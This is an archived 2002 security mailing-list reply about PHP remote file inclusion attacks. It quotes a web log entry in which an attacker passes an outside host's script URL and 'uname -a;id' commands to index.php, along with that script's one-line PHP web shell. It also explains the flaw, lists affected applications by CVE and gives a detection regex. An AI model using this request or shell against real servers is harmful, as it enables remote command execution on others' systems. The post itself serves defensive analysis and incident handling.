zeno <bugtraqat_private> said: >I figured a few people may find this interesting. > > >200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)" > >contents of www.jtecx.hpg.com.br/jtec.txt > >------------------- start snip > ><?php >system($cmd); >?> > >------------------- end snip A number of PHP scripts have demonstrated this type of vulnerability, which was documented in "A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications" by Shaun Clowes; see http://www.securereality.com.au/studyinscarlet.txt (http://www.zend.com/zend/art/art-oertli.php also looks useful). This has been a topic of discussion on the webappsec list. Basically, PHP can allow the programmer to access files from remote sites. PHP scripts that don't properly filter arguments to an "include" command can have a remote URL injected by the attacker. PHP also allows you to define variables as a parameter (field) into the script. The combination of these factors makes it easy for an attacker to execute code in the vulnerable application. Note: this may be dependent on configuration and/or the PHP version. Some vulnerable applications are: BUGTRAQ:20001125 Security problems with TWIG webmail system URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2 (CVE: CVE-2000-1166) BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2 (CVE: CAN-2002-0206) [this could be the vulnerability being exploited in zeno's example] BUGTRAQ:20020506 b2 php remote command execution URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2 (CVE: CAN-2002-0734) BUGTRAQ:20020517 Phorum 3.3.2a remote command execution URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2 (CVE: CAN-2002-0764) A generic Perl regular expression to catch some of these exploits is: /\.php[2-9]?\?.*=http:\/\// This seems to do a good job, although it could generate some false positives for valid PHP scripts that pass URLs as arguments, e.g. for redirecting the user out of the site. - Steve ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Sep 19 2002 - 08:50:11 PDT